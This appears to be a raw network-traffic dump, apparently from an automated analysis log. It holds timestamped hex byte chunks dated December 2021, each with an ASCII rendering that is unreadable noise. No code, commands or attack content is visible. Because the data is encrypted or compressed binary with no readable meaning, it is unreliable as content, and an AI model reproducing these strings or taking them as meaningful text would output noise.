                                                                                              2021-12-13 23:57:10 UTC100INData Raw: f6 f5 9c f6 06 75 49 a1 18 d3 da 3e 84 06 68 dc 65 80 82 ce 76 85 a7 fa fa 1e c2 87 71 e3 42 83 59 7c 7f c0 ac b4 8f 5d c0 79 bf ff ba d9 ab 83 f4 aa cb ec d5 0e 78 15 7d a4 2d ee 2a a6 1e fe 98 b6 61 bc bc 66 ab 37 a6 65 88 ba c8 32 b8 3a 3a 99 51 1f 3c 90 f4 8f f3 73 44 72 35 f3 c7 da b0 d1 f4 d0 77 05 d6 32 a8 0e 6f 25 dc a6 a4 33 8f 5f fd 1c 50 78 4b 4f 72 f9 35 1f 9e 0d bf fe 98 ce 87 74 13 77 03 66 fd 12 5c 91 a7 bb ce 20 ae f9 d4 34 58 7a 7d 61 00 7d db 68 5d 27 60 b8 4f 17 32 01 d9 9f 17 82 7b 66 2c fb c1 df 9f 49 44 70 3f 6c 82 e0 9e 38 df 5e 4d 58 fa 5c 77 86 93 29 58 54 8b e1 d0 84 d7 eb 8d f8 1b ce 45 0d c0 2e 35 4f 2f bd 42 10 46 7c c2 21 32 93 c3 09 d8 03 ea d6 0d 99 83 a5 25 fa a3 34 e8 d6 57 1c fa 66 66 70 5b 2a b3 9c f3 5d 5d c8 46 50 9b
                                                                                              Data Ascii: uI>hevqBY|]yx}-*af7e2::Q<sDr5w2o%3_PxKOr5twf\ 4Xz}a}h]'`O2{f,IDp?l8^MX\w)XTE.5O/BF|!2%4Wffp[*]]FP
                                                                                              2021-12-13 23:57:10 UTC101INData Raw: c1 b2 41 84 19 92 94 7a 60 20 6d be 7c b7 20 75 be f0 7b d6 50 1e 3b a6 5f 5a 04 7d f5 08 a4 7e 58 fd fc e7 63 61 82 a2 75 2a 81 8e b0 77 94 55 a3 ea e2 03 93 9a b2 ea 34 6b 39 cc bc 2a 2c a7 68 bd c3 ef 53 b3 9e 43 5e 48 27 7b 3c dc a9 8a 77 58 7a dc fb 91 2f b6 8e a6 82 d0 10 c7 58 76 e4 89 42 5b cb 47 02 0f 90 15 ca 0b b6 51 b5 c3 ea 7b b7 58 8d 85 13 6d 1c 7e 05 85 39 b6 1b ab bd f1 1d 3c 63 c9 37 87 ec c1 27 29 ed 11 f5 45 48 0b 94 44 1b 8f bc 92 13 4b 77 19 4f 57 0e 65 06 29 9d aa 3e ca cb 24 1c e0 46 f5 15 29 96 76 1c a4 eb 5e ef 47 64 35 07 7f 2d ba f4 38 de 63 0f 5f c6 64 35 f2 de f1 00 24 33 13 ed 6a 73 45 83 cc f1 1e 11 53 1f 89 bc 77 2a 53 ea 4b 79 6a 81 52 5b 31 f5 70 e4 bd 33 99 52 8f 4d 89 5d 27 a0 89 cc 85 a6 31 94 de 9a c2 6d f4 bc 1f 99
                                                                                              Data Ascii: Az` m| u{P;_Z}~Xcau*wU4k9*,hSC^H'{<wXz/XvB[GQ{Xm~9<c7')EHDKwOWe)>$F)v^Gd5-8c_d5$3jsESw*SKyjR[1p3RM]'1m
                                                                                              2021-12-13 23:57:10 UTC117INData Raw: 92 a5 3c 98 15 14 68 01 4b 20 9e c5 42 4b ed 8d 29 96 c2 8a 81 b8 00 dc 11 bd 88 15 73 30 43 f2 5f c6 14 4b 63 c5 30 03 1a 14 fb f4 0e e6 93 87 09 13 e8 83 d1 62 23 31 67 71 fc 6f 28 86 ff b5 a2 46 09 bd 77 98 06 e9 aa 80 f5 5b 71 bb ee a1 51 6a 90 38 31 d2 22 f2 08 a3 c0 a3 6b 41 46 5f c3 20 a3 41 87 dd 3d 48 0e 92 34 2d c2 e8 2f cd 66 41 9a 29 57 59 99 ee 9c 6b ab d2 32 1f d4 85 6c b5 d3 52 b8 9f a4 92 25 62 81 e4 ee 77 35 d5 5e 45 9a 76 a2 32 0b 43 7a fb c4 43 83 2c 09 37 30 fc 39 7b d8 95 2c 8e 46 33 b3 43 bf 83 5d 75 1c 7a c1 89 eb 99 25 06 f7 d7 6c 0c 99 a5 99 68 5b a5 86 c6 4a 25 13 31 f6 de e2 27 cf d2 a2 2d dc 6d d5 dd 37 ac 4f b6 aa 0f 41 df 0a 07 ae 1a f4 81 ab 02 c4 65 89 3e 8b 12 81 b2 db ca 81 32 df 46 a6 6f 65 42 21 0f 81 38 b8 32 ae e0 cf
                                                                                              Data Ascii: <hK BK)s0C_Kc0b#1gqo(Fw[qQj81"kAF_ A=H4-/fA)WYk2lR%bw5^Ev2CzC,709{,F3C]uz%lh[J%1'-m7OAe>2FoeB!82
                                                                                              2021-12-13 23:57:10 UTC118INData Raw: 94 4b 96 e4 69 26 c4 44 5c 4b 16 89 f6 1d 4d 20 00 14 a3 4c 94 0d 40 39 77 1a c3 5c a3 e9 b6 83 c5 ac be cb 70 b4 cb fe 4b 5e ff 8d e7 5b ff 9c c1 ff 55 fd 47 1f 3b cf fa c7 9e f9 8a fa 39 3d 47 4a 92 70 be 88 fe ff 3e 7f 09 08 b0 67 7c b4 0e 46 e4 83 69 ee 7b 1c 50 c6 9f 45 da 24 0f ae d7 3c 52 84 e1 1a c7 90 85 d9 91 46 ab 6b ae 58 6b 95 8b 32 e9 33 eb cf 2a a4 28 9b f8 33 23 7b ac 96 43 f2 5c 2b 5a e9 2d cc ee 4d 01 a6 79 61 96 54 aa 31 7f f5 87 43 e3 88 45 32 a3 69 a5 20 cd 13 31 a2 97 b6 70 16 5a 95 85 b0 f5 48 e9 eb a3 1a e7 b8 ec 31 c3 f7 bf 18 09 38 8a 56 35 68 76 b1 90 a4 59 5a bc e8 14 bf 98 59 24 c3 7a 87 a7 d7 e3 08 31 f3 4e 91 d5 d2 21 a7 3f 29 95 3a a2 dd 12 c9 18 69 74 81 c6 8f ba 1d ae 96 ea 23 cb 8d cb 95 23 18 4f 76 85 19 01 ca 45 d7 97
                                                                                              Data Ascii: Ki&D\KM L@9w\pK^[UG;9=GJp>g|Fi{PE$<RFkXk23*(3#{C\+Z-MyaT1CE2i 1pZH18V5hvYZY$z1N!?):it##OvE
                                                                                              2021-12-13 23:57:10 UTC134INData Raw: ea 93 96 2d b2 45 5a 94 aa 1b 48 1a ef 08 eb c7 64 ad 1f 15 e5 a4 79 79 ec 09 35 f6 ab fe fb 9c f6 90 e6 61 3d 96 38 bc 76 24 81 57 16 c0 4b 03 c6 71 2d 3a 6f 8d 95 1c 0c 4e 09 6c 86 bd 00 78 0a 5a 3e 4b f7 fc 95 7f 86 c4 37 40 bf 8b 5e b5 54 8d 08 4a 3f 7a ff 4b 16 de 96 1c d4 f6 57 f2 ee 97 fc 08 28 4c 87 f1 fd bd e8 43 98 e1 d2 7e 20 e2 6b f7 e0 11 05 9d 36 a4 28 ac 62 d2 a1 da 12 e3 d1 c7 4f f5 aa 59 92 98 7c 5e af 99 84 69 42 8d ad 27 cd 2a da f5 24 bc fb e3 49 d6 da da 3d ec 54 c5 cc 38 fe fb b0 fe bf 9e 33 b6 2a b2 56 7b 68 96 b1 d5 14 fa 3f dd ac 55 31 59 cd c5 7a ab 89 3d 9a 71 d2 9c 3c ea 8d ec d6 cc ca 88 a7 df 4b af f9 54 51 f2 4f cc 2a eb b4 3f 8e ae f7 95 1b 60 03 9a 45 d2 30 d0 c4 4a 51 ae b5 f8 e9 1f 5d 26 41 b6 ad dc 34 ed 7e 98 12 53 e5
                                                                                              Data Ascii: -EZHdyy5a=8v$WKq-:oNlxZ>K7@^TJ?zKW(LC~ k6(bOY|^iB'*$I=T83*V{h?U1Yz=q<KTQO*?`E0JQ]&A4~S
                                                                                              2021-12-13 23:57:10 UTC135INData Raw: 06 16 9f 16 d5 84 69 a4 20 4b e9 20 37 91 83 a4 93 7c 48 1e 74 28 47 5d cd e1 31 ae 7f 84 d3 2a ca cb b6 9a 96 37 c3 cf 0d 8d cb 9b 0d f1 0e 41 4a 61 46 62 6f 05 70 d7 0e da 31 dd 8e 72 2c 98 42 fa 95 63 68 c2 4d b3 ef 62 fc 3c 46 be 0a da 95 63 bc 98 03 8d 93 a0 98 5d 2f 76 e6 4e 64 5a 30 25 17 79 c0 9a 93 4f 8a ad 39 e3 31 ef bf eb 53 2f b3 4d 7b 13 e3 8b 85 ed d4 54 ce d2 57 a8 f1 96 e9 9e 15 c6 5b 03 7d e1 6b 8a 94 3a 60 a1 15 5c 1c 65 c1 c9 9e 48 5f 6e 13 1d ab f7 1c c3 38 7d 84 4c 0c 2a 3e 82 62 4c df ef bd 93 f5 bd d5 4d b9 44 db 87 35 e8 7c 24 c5 94 21 5e c6 f7 70 2e e7 5f b3 50 f3 d3 47 ca 6c be 92 e1 33 8d 50 63 a6 91 3e 9e 69 84 ea 99 46 fa a2 42 26 71 a7 93 b0 55 e3 8b ad f5 fb 6a b3 30 15 9a 45 2e 6d b3 34 61 4e 6d 77 5b 89 e4 ee a0 df 1f e2
                                                                                              Data Ascii: i K 7|Ht(G]1*7AJaFbop1r,BchMb<Fc]/vNdZ0%yO91S/M{TW[}k:`\eH_n8}L*>bLMD5|$!^p._PGl3Pc>iFB&qUj0E.m4aNmw[
                                                                                              2021-12-13 23:57:10 UTC151INData Raw: 08 c9 21 ba a1 50 d2 aa 29 b0 03 1f a4 e7 ef 94 24 c8 6c 7f cd af ba 40 d9 5a 7f 77 b7 c6 ce fe d0 ef 79 16 23 ac 9c c1 fb 0d da 68 af 47 db b4 3d 91 fb eb 23 1e 62 c8 b7 ad 27 e3 54 70 7b b2 4e de b6 bb 3e 02 96 fd 19 96 9a 6f ed c9 b0 8c 85 a0 ea 13 bd da 7c 7f ca 27 c4 5c 0d f3 00 d3 30 89 41 0f f5 f7 c2 4e bb 70 2a 94 5e 00 1f 50 f6 3a b3 96 57 e1 c8 34 57 38 b2 af 64 04 b3 4f a4 19 01 f7 6d 72 d5 b3 57 80 ca f7 ef 53 10 b8 30 06 26 01 36 b6 00 9e 3b ae 03 36 c5 ad 7f 0c d0 a8 3b 31 9f 0b 64 c4 c6 b3 ad 07 01 05 e6 b0 93 2a fd 3c 17 bc 37 82 83 21 eb 18 3a fe d1 83 e3 71 09 2d b3 bb 35 b7 b6 0b 70 97 9d ba ce ef e5 b9 53 3c 0c dc 7b 97 34 0d 0d 6f 1e fe 33 3d f0 1e b7 32 84 6b f3 53 d4 eb 8d 18 7e 51 b7 ee 6d dc 5e d6 6c 13 71 60 c1 d9 64 c6 15 07 83
                                                                                              Data Ascii: !P)$l@Zwy#hG=#b'Tp{N>o|'\0ANp*^P:W4W8dOmrWS0&6;6;1d*<7!:q-5pS<{4o3=2kS~Qm^lq`d
                                                                                              2021-12-13 23:57:10 UTC152INData Raw: e4 29 49 f8 ef 81 1f 22 74 1c ce 32 85 a0 fe ed e9 c5 88 e7 a2 65 b7 61 84 83 5b b6 55 fe 06 93 91 42 29 35 36 b0 b2 db f9 01 b1 86 5a 98 80 33 0e 6c d6 8c fa b2 5c 35 a1 1b 19 23 c9 9e b4 80 9d 16 b3 99 98 93 b3 fa 7e d7 1c 47 ee ea 25 b0 19 b0 6b c7 ea f9 ae 05 8e 31 ab e7 e8 87 2a e0 80 d8 05 37 63 6a b3 e8 ae b3 98 b3 73 ac cd 0e 10 47 86 3b ec a4 16 75 d3 d0 df 80 5b 7b 7e 07 f7 e3 bc 8f 75 02 0b bb 7c 85 95 83 02 e0 28 79 0b 64 2a 89 89 e9 89 fe 47 e0 f8 40 ce a1 25 f9 45 e8 38 eb 61 cd df c0 af 25 bb db b6 16 92 5d 56 1e b5 6d 00 42 73 fd 06 0c 2b 36 35 cb 24 c5 02 2e 36 11 b7 a5 f2 28 57 3f b2 3e 66 d2 71 c7 ba 80 7f 8e 76 c1 89 27 8b 94 66 e7 15 d9 f3 4a 33 6b 28 14 91 03 a5 eb 4d fe b1 8c 31 82 30 10 70 64 e5 9d 51 cb 33 c8 87 9b f3 f6 93 66 c8
                                                                                              Data Ascii: )I"t2ea[UB)56Z3l\5#~G%k1*7cjsG;u[{~u|(yd*G@%E8a%]VmBs+65$.6(W?>fqv'fJ3k(M10pdQ3f
                                                                                              2021-12-13 23:57:10 UTC168INData Raw: d6 9f d5 b9 48 49 3a 13 f2 62 bd 31 62 10 65 fb 37 d9 da e3 b0 ff 6c e4 7f 53 71 e8 6d 80 0c 67 3a 31 5b 84 a7 15 e3 d7 43 5d 9c 3f 62 a8 f1 21 d5 d3 4f 67 ad e7 99 2c a0 a7 9b 93 7a b2 de 2e 2a fd a6 21 57 81 52 53 9e 15 15 87 f0 6f e0 9d c0 5b 9d 4f 34 47 bb a9 39 16 ca c6 c0 3e 4f 3d 0e e9 85 ef 83 38 ea f2 fa 39 4f 66 ae 9e 12 3c ca b3 75 78 5d b1 07 7f 04 0f 46 83 57 88 57 22 4b 14 32 3b 77 3f 99 2f fb 7d b9 11 ef 8a 00 73 45 8c 45 d5 75 01 9b 44 16 5e bc 9a 33 f1 ee d4 b8 3a 7c 24 29 ae 8e 78 fa a2 a1 75 3d 46 c4 c9 38 af b1 9a c9 e1 b1 db c5 92 04 7d 27 0a 3f c2 54 eb 7a da ea 1d fd 31 1c a0 fd 77 7c ae 73 ba 94 e0 e8 d1 0c 12 0f d6 c3 0e 8a 28 25 30 25 14 30 df 55 5f 47 f2 85 66 a3 84 6b ba 70 97 36 7f c3 73 42 a1 40 df 8f 08 02 3b 0b 1f d4 5b e6
                                                                                              Data Ascii: HI:b1be7lSqmg:1[C]?b!Og,z.*!WRSo[O4G9>O=89Of<ux]FWW"K2;w?/}sEEuD^3:|$)xu=F8}'?Tz1w|s(%0%0U_Gfkp6sB@;[
                                                                                              2021-12-13 23:57:10 UTC169INData Raw: 1e f1 f6 a2 7f 62 50 c6 3c 3d ac 28 4b 06 4e e3 d2 0d d0 50 49 b8 51 29 36 b5 88 b4 f4 a2 90 1c d5 0a 64 ee ec 68 f7 b1 75 34 ea c1 91 f9 92 bb c5 b9 bc df 58 62 2f ed 7c 01 56 77 50 ad 4c 41 30 59 5d 2c ab f7 4a 91 4c 46 ef b1 c4 05 a6 10 19 43 16 48 9a e4 61 94 02 c8 84 57 5b ac 78 69 cf 49 a0 0f 79 40 1e 2c 65 b5 eb 5f 64 1c 40 75 a7 f8 14 f8 78 88 17 59 27 69 4a c8 9c 9f 1c 3e 3f e4 50 d5 e5 7c 7a 3e 8e 4d 4f 8b bb df b9 bc c5 db 2b b3 e9 21 87 fc 74 08 56 88 64 b2 e9 59 a7 68 f9 a2 97 15 63 f2 d2 1f f9 1d 20 8f 00 9f cc db 87 48 9e 59 c2 1e 28 4e 2c c0 fd 4f e8 7f 63 9a fe 8f 05 2e a0 7f be 7e d7 58 c8 1b 4a a1 df 64 bc e4 28 a9 74 61 25 9f 78 ff 53 8f 1c 11 18 e5 5c ab 15 b8 22 1e 97 81 b6 95 71 68 ab ff 9a 53 4e 33 15 1f e3 d5 1e 17 92 4c e9 06 2f
                                                                                              Data Ascii: bP<=(KNPIQ)6dhu4Xb/|VwPLA0Y],JLFCHaW[xiIy@,e_d@uxY'iJ>?P|z>MO+!tVdYhc HY(N,Oc.~XJd(ta%xS\"qhSN3L/
                                                                                              2021-12-13 23:57:10 UTC185INData Raw: 08 45 da c5 37 9c 6a c1 b3 12 77 18 0a 60 a5 01 3c b2 19 01 04 3d 00 20 e8 85 1a 2f 75 7b 8e 47 f5 90 f3 80 d3 50 e8 e5 04 02 88 d9 0e 1c 81 f8 0e 9f ea 6f 11 65 eb 00 68 14 7d f1 01 c0 c2 cf bf 21 ca 75 f8 fa 21 0f 92 27 28 bf a9 60 3f c8 85 a1 13 d0 fb 2f 6c 09 89 e3 51 59 80 19 d2 b7 b6 08 b6 b7 65 bf 42 17 12 4e 45 bc cd cb 41 b3 08 5b 41 7d 13 d0 91 d6 b3 52 a7 11 58 71 81 8e 28 63 bc 05 4d e5 83 99 6a 7b 10 d7 5c af fe 45 b4 7e 39 79 1b bc c7 02 63 f6 d5 50 70 f4 be 29 92 3e 5d 7c 7c 47 78 70 79 5e 72 9f b1 28 0e 36 fe 1e a8 bf 01 fe f8 7a f9 3c 6b b6 1e 92 c5 a0 21 99 d3 18 a5 21 06 3b b5 15 0a 8c 6f 3f eb e9 1b f6 04 f2 15 69 72 9b 84 d6 a4 60 eb 28 46 62 62 ad 36 c4 2c f8 0c af ea ca 0b 6c cd 5f 3a 79 b2 5c 30 79 52 ec 02 c6 ef 5f 75 fc c3 8d 74
                                                                                              Data Ascii: E7jw`<= /u{GPoeh}!u!'(`?/lQYeBNEA[A}RXq(cMj{\E~9ycPp)>]||Gxpy^r(6z<k!!;o?ir`(Fbb6,l_:y\0yR_ut
                                                                                              2021-12-13 23:57:10 UTC186INData Raw: 21 08 4c e0 9a c9 9e 69 d8 fd c6 f2 04 16 d1 bb 59 b6 36 ab b6 74 e7 76 a0 d4 da 89 17 d3 b3 5c 10 9f 89 2c d9 80 59 47 41 b6 1e 60 4c f1 ef 2f a9 ec 1e 2e 96 c8 c6 44 51 b0 ab 19 2e ae 67 12 f2 db b5 f8 b5 c9 06 6d ae 99 82 89 14 67 f3 0e ed 5a f3 c4 14 c4 bb a0 4f cd 7a e5 7d 3f 11 1b 9d aa d7 e8 c2 44 40 2c ec a8 3d ee 9a 2e 9f 8d de 64 77 5d 75 dd a0 66 bc 4f 55 26 9b 03 77 bd df 7d 0c 9c af 49 ff 58 e7 ba d0 5e 79 1d ee 95 61 0a 4d 83 90 54 ca b2 1e 20 f3 e5 bb d8 1d 9f d6 35 1d 44 66 4f c6 3a 9b 5e 63 84 fb c9 94 20 e1 19 94 88 12 4e dc 8f 8c 25 8c b8 b7 24 24 fc 06 79 65 67 cc 3b 85 bd 1b 17 d3 22 97 04 b3 9b 5f 5d 27 c1 81 05 f4 d3 6d d3 c1 8a a5 05 9c 96 78 6f ca 45 1f f2 0e 05 fb 3e 3e 3a 53 e1 ca 37 ba b4 3b 59 35 d7 e9 5d f6 8e 96 b4 8b e0 d8
                                                                                              Data Ascii: !LiY6tv\,YGA`L/.DQ.gmgZOz}?D@,=.dw]ufOU&w}IX^yaMT 5DfO:^c N%$$yeg;"_]'mxoE>>:S7;Y5]
                                                                                              2021-12-13 23:57:10 UTC202INData Raw: 74 89 e9 a2 3c 05 ea cf 40 bb b4 74 bc 73 6d 4c b2 d1 b6 e4 74 a3 fc 3c 37 c5 7c 69 f7 84 8d a0 20 0b 9b 04 eb cf 8a d3 9a 43 be 34 fc 10 db 13 d0 3c 21 63 51 09 a6 47 c8 22 cd 81 36 64 8f 4b 68 35 9c c1 18 86 6f b0 34 0b 3f 68 63 12 2a 58 2a e3 4f 86 45 65 d1 cd f1 db 09 0f ed 04 7e e8 c7 f1 4e 4c 71 fb 97 eb 8a 4d e4 0f 12 b5 92 5e 06 cf f9 a2 05 b2 98 4a e0 1c f6 26 85 61 61 f8 44 5e 46 74 07 62 e1 0e 38 e9 45 a0 c4 99 73 a6 1b ed a2 52 b5 51 e2 b0 ee 42 0c 84 38 1c d7 9a 2f 6d 6f dd 27 50 53 25 a0 7e ec 76 e3 dd a7 f5 18 21 40 71 1e a7 d7 52 21 04 f8 46 30 9a f8 c8 0f b8 a9 ab 11 27 d1 c0 03 f7 b1 01 33 5b 1e 17 dc 27 08 a9 44 2b d0 1f f8 bf 4e b2 02 99 6d cb df 8b 1a 77 06 42 90 05 05 73 bb de 63 5f 50 5a 55 1b b7 09 ca aa 8b 45 48 17 be 0b ff dc ca
                                                                                              Data Ascii: t<@tsmLt<7|i C4<!cQG"6dKh5o4?hc*X*OEe~NLqM^J&aaD^Ftb8EsRQB8/mo'PS%~v!@qR!F0'3['D+NmwBsc_PZUEH
                                                                                              2021-12-13 23:57:10 UTC203INData Raw: 08 b4 1e 97 0f 8d ca c2 aa dd d4 64 00 2c f4 0a 64 91 0a 07 4e 36 4d 01 c3 c7 ed 44 65 0f 57 e0 97 37 0e e8 79 1f 04 6d 63 ca 83 b6 07 ca dd b8 6a af 15 0e 11 c1 6a 10 8a 4f 4a 05 08 51 61 9a 36 56 69 06 f8 01 1a 6c d8 ef 50 9a ff 1b b2 38 9c 16 9b 14 80 7a 19 5a 5b 50 9a a9 34 ef 80 6b fd 0b fd e3 82 b7 e8 81 d0 92 ec a0 3b 3d 98 e5 81 fd 4b ad 3a ad ca 77 95 fa 29 4d 19 77 22 58 6c ab 9f e1 c6 13 3e 21 6f ed 02 26 39 ac 04 56 c1 e8 ec d0 8f 05 05 96 a8 fe f0 1c 00 a3 86 f8 93 fd 6e 3c 76 d3 80 ce 10 2e 2d 06 1e 5e 92 ea 70 f1 dd a0 16 74 21 0e 53 b5 df 0b 31 25 09 cf 7c f5 03 a6 e3 0e 27 e3 63 0a 52 b5 ff 07 a0 49 f7 1e 1b 4d 7a 92 f7 81 da 63 db 73 86 66 a6 a1 29 8f ba 00 5f ae 04 01 36 54 67 fd 50 8c 61 64 2b bb 36 d5 2d 60 a0 a1 3c 97 96 78 62 80 ef
                                                                                              Data Ascii: d,dN6MDeW7ymcjjOJQa6VilP8zZ[P4k;=K:w)Mw"Xl>!o&9Vn<v.-^pt!S1%|'cRIMzcsf)_6TgPad+6-`<xb
                                                                                              2021-12-13 23:57:10 UTC219INData Raw: 4a eb 8a 41 8d e0 e6 a2 dc 66 73 b1 d1 77 a6 49 52 54 4b 73 3a c8 07 ac 9b 84 33 99 ed 0f b0 16 2b d1 1b 4c 5b bf 79 c9 6f 06 b1 36 a6 b2 b9 c2 7d 95 e0 11 58 08 ae 3e a8 eb fa ed f1 c2 d6 83 01 40 52 36 9b 0c 3b 53 c1 14 cc 06 82 2a d6 71 4b 16 6e f9 0e c7 34 f0 f9 a1 a0 22 3b 25 d3 54 cc 77 06 c2 12 48 4d 4f 62 86 22 a1 03 c1 37 27 24 18 75 57 83 e4 d1 b3 a1 9e b7 ee 1b ca 35 da 21 b3 8d 7a de 40 a1 68 c3 0a e5 1c 6f 4a 8a a2 47 99 63 65 df 4e bc fc 11 93 81 e0 d6 9d ee a5 8e fb 22 6c 6c b1 64 e3 a4 75 c8 46 4e b3 77 16 7b 93 17 e7 70 c7 5d 51 ac ec 91 12 4e 40 61 c0 4b 56 6f 6e 40 03 be 6e b2 10 5b ab 12 65 f0 94 d5 fb b6 5a cc f7 cc c4 af 13 ef 8a 5d c5 c4 3e c5 8d 40 36 0f 3f e1 3d 38 15 bf e1 c7 a3 8c b1 b0 9c 75 a2 16 7e 34 7b c0 12 16 83 68 e2 f4
                                                                                              Data Ascii: JAfswIRTKs:3+L[yo6}X>@R6;S*qKn4";%TwHMOb"7'$uW5!z@hoJGceN"llduFNw{p]QN@aKVon@n[eZ]>@6?=8u~4{h
                                                                                              2021-12-13 23:57:10 UTC220INData Raw: 3e 74 2f bb 2f 98 b1 af 05 78 df be 65 a0 52 e4 e0 3b 93 c2 76 fe c3 13 6d 46 4d 70 32 0d f2 9b 6a ce 64 b0 57 bb ce f8 9c e2 f5 24 4f 71 b9 2f 57 0f f6 40 ee f1 d3 f7 e3 17 41 77 3b c9 c3 80 02 80 3b f8 2f 50 75 28 66 c4 c1 28 a5 dc 7b b8 ad f7 5f a3 f0 4f 82 31 07 18 63 0e 24 5b ff 04 a1 8b 76 3e 9d 98 d0 ce 55 fc a6 fc ac 5c 77 bb 56 e0 6e c7 c4 cb c3 49 e1 85 50 e6 61 b2 2a 93 a8 87 f3 26 0c 71 85 ab 3e 73 b9 db 03 23 78 7d ab c2 0b 4d f2 2e a0 64 31 fb b2 2a bc cc c5 89 dc fb 18 54 df 61 1d 5b 97 73 4b 77 a1 57 a6 3a cd c3 9d 10 2b 20 db 60 61 3b 39 49 72 c0 20 81 78 4b ad 76 bb 4d 20 7e dd 17 38 ae b2 a3 7b 04 00 3c 5b 69 e5 18 f6 9e f6 9a af d9 82 54 00 03 83 a9 c5 05 5e 62 4b e6 16 49 bf 18 15 0b a5 d5 3e 0b 19 16 fd e0 d3 b5 35 a5 dc 7c d3 63 82
                                                                                              Data Ascii: >t//xeR;vmFMp2jdW$Oq/W@Aw;;/Pu(f({_O1c$[v>U\wVnIPa*&q>s#x}M.d1*Ta[sKwW:+ `a;9Ir xKvM ~8{<[iT^bKI>5|c
                                                                                              2021-12-13 23:57:10 UTC236INData Raw: 93 ca 6d 80 89 fb 29 72 db c5 15 9c dc 4d 72 36 6a 67 00 7a 50 f3 06 63 06 9c 9f ad 28 34 3b dd 0a 5e 3f e9 b1 19 c7 3f e3 aa f5 82 4b 05 c7 47 47 33 e4 af c5 f2 83 35 36 2f 6f 0b 82 4b 04 af 9a 2e 3c 98 4a f9 ce d7 fe 02 f1 d6 1e a9 92 a0 33 c9 07 f3 46 a8 fb 78 86 2f ae 9e 9d 70 fc 64 4c ff 1d 40 ff 0a d6 39 ac ca 7f c1 a1 60 03 e0 ed dc e4 6b 80 c4 43 e9 7c eb 79 93 f0 6d f0 01 54 6e af 2f 72 86 a6 fa e5 c5 98 63 13 66 62 59 f3 34 d2 ba 83 77 43 30 b9 bf d1 24 cf d2 6f e1 e9 83 7a b8 7b b1 48 e5 62 c9 1a cc c3 6f f0 cb 26 a8 31 83 3e ec 05 87 77 65 aa cd 04 d9 e2 7d 54 f2 22 c3 c1 2c 9a 9b 0b cb 99 b3 ad 28 9b 24 8d 4f 9c 20 6c c4 ee 8f 6e d4 cc 12 2c 81 c1 f2 f1 c2 3d 0c 78 e5 f0 ce 36 55 ad e0 72 a0 1e 34 5f 47 4d 87 1f 35 f3 86 f1 95 f9 8e 24 34 d7
                                                                                              Data Ascii: m)rMr6jgzPc(4;^??KGG356/oK.<J3Fx/pdL@9`kC|ymTn/rcfbY4wC0$oz{Hbo&1>we}T",($O ln,=x6Ur4_GM5$4
                                                                                              2021-12-13 23:57:10 UTC237INData Raw: a4 bf 50 06 32 f2 8f 96 c5 94 f8 16 ca 88 81 97 a6 bf f5 6f 31 fd 0d 3b 31 9b 1a cd f1 26 80 2f a5 2f b9 05 ef a4 b5 c0 12 6f c1 9e 2f ae bd 05 9b 8a 2f dd 82 44 fa ff 3b 4d 9e 8f ff 4d 12 fd 51 4a 3f 47 e9 8f 26 d0 ff 21 a4 3c 97 ca 12 e8 5f fe 11 d0 9f 07 f4 8f 7c ae d1 cf 11 fa b9 b8 04 67 20 7f 44 23 ff fd a5 06 e4 07 92 e9 27 f9 90 6c c4 3f e1 22 ca 22 c8 27 39 07 88 56 fd 67 58 66 ed 49 55 03 0f fd 0b 55 03 59 d2 2a 07 df 68 a9 42 c7 f1 77 c1 27 c1 6c 7d 42 c4 4f ec 3b 26 55 02 c2 29 0f 39 e9 5d e6 50 2e 89 0e 85 05 96 59 f1 d8 f7 00 37 88 17 70 c7 be c3 97 ac f8 96 5e 51 18 b5 ac 5f b8 6f 0b d4 c6 9f b4 ee 66 a0 f6 4d d6 5d c5 e6 7b 96 25 3e 66 81 c7 06 c6 b4 c7 f4 eb 26 7c 1d a6 25 83 78 76 72 a0 7e 01 65 27 36 7b bf 61 b3 d7 bf 4a 9a bd f9 1c 34
                                                                                              Data Ascii: P2o1;1&//o//D;MMQJ?G&!<_|g D#'l?""'9VgXfIUUY*hBw'l}BO;&U)9]P.Y7p^Q_ofM]{%>f&|%xvr~e'6{aJ4
                                                                                              2021-12-13 23:57:10 UTC253INData Raw: be bc fe cd cf e3 46 f1 a2 8b 8e 22 cd 58 17 b2 5a 10 f9 40 86 7b 69 5e 92 f3 9b f8 fe 0a 13 fb 9b 90 51 7f 9c 4b a5 0d e1 16 3c 5b ed cf 91 a6 bf 29 89 fd 7d 30 2a 93 fe 9e 65 b5 e0 29 de 4e 7c af 13 1c 67 7c d7 c5 10 05 36 11 cf 29 b6 f6 97 8d eb 0f a7 ba f1 e7 b9 da a8 a6 26 8e 6a 5c 46 a3 fa 79 a4 3a 2a 69 d3 42 1b c7 25 3d af 47 4f f5 41 7a c8 33 b6 c6 f3 c4 33 59 f4 b4 3a 2b c5 a1 b0 f5 89 5f d2 f8 64 0a 6f 7f b7 d3 4f ec 8e 19 4a 87 7a 90 2b b4 af ba 84 b3 6e 61 ac 7b 4b e6 48 77 76 92 28 eb 61 ae 84 f0 d5 33 4c 2f dd d7 1a f6 e3 6d a4 a2 ba 1f e7 05 f0 f7 51 c3 7e 8c d8 16 91 31 ea 13 22 bd 9b 96 8c 25 00 e3 35 a6 7d a6 64 84 e9 fb 67 c8 f7 6d 25 23 b4 ef 49 3f bc 8d 6e 66 68 97 74 e8 0a e0 c5 c6 0e 77 9a ff 48 4b cf 18 af af 14 f9 b7 6a 81 95 7d
                                                                                              Data Ascii: F"XZ@{i^QK<[)}0*e)N|g|6)&j\Fy:*iB%=GOAz33Y:+_doOJz+na{KHwv(a3L/mQ~1"%5}dgm%#I?nfhtwHKj}
                                                                                              2021-12-13 23:57:10 UTC254INData Raw: bd 88 f5 2e 87 85 47 57 42 f1 f8 53 b2 1a a4 29 ad 9b 41 ba 8f 88 2e 52 4e 25 ac d2 e1 8a 55 6c aa 54 3c 77 7b 01 cf e4 c6 af 3e 06 87 31 07 d4 3a eb c6 0f d2 72 05 17 89 6b de 02 7e 3e 90 0e 1f b4 f0 7e 6b fc ff 41 3c 30 82 6a 05 7c 72 12 0c 8c da b7 a1 68 c0 d2 be 95 d0 9b 54 48 bf aa 08 3e 0c ba 20 80 26 3f 4b 23 7a 15 99 12 83 a3 fe 3e 2b 30 a6 0d e5 29 c2 ea fa 48 76 2f 08 bd 8c 5d 2b d6 87 f8 e4 78 ae d1 01 c9 8d fe fa 7b 5d 86 01 0b eb 93 87 5e 4d db 24 5d fc 4d 6a 93 5e dc 44 a5 3c 95 ce f3 13 a5 f3 57 39 aa 43 26 ad 00 c5 84 a7 b9 ad 60 0f 06 6b df 28 aa 8c f1 12 16 eb 33 49 8f 1f c7 5b 7d c7 38 e9 69 3a 54 5f f7 56 5f 0f e7 67 43 5d 67 6b ab e9 51 c7 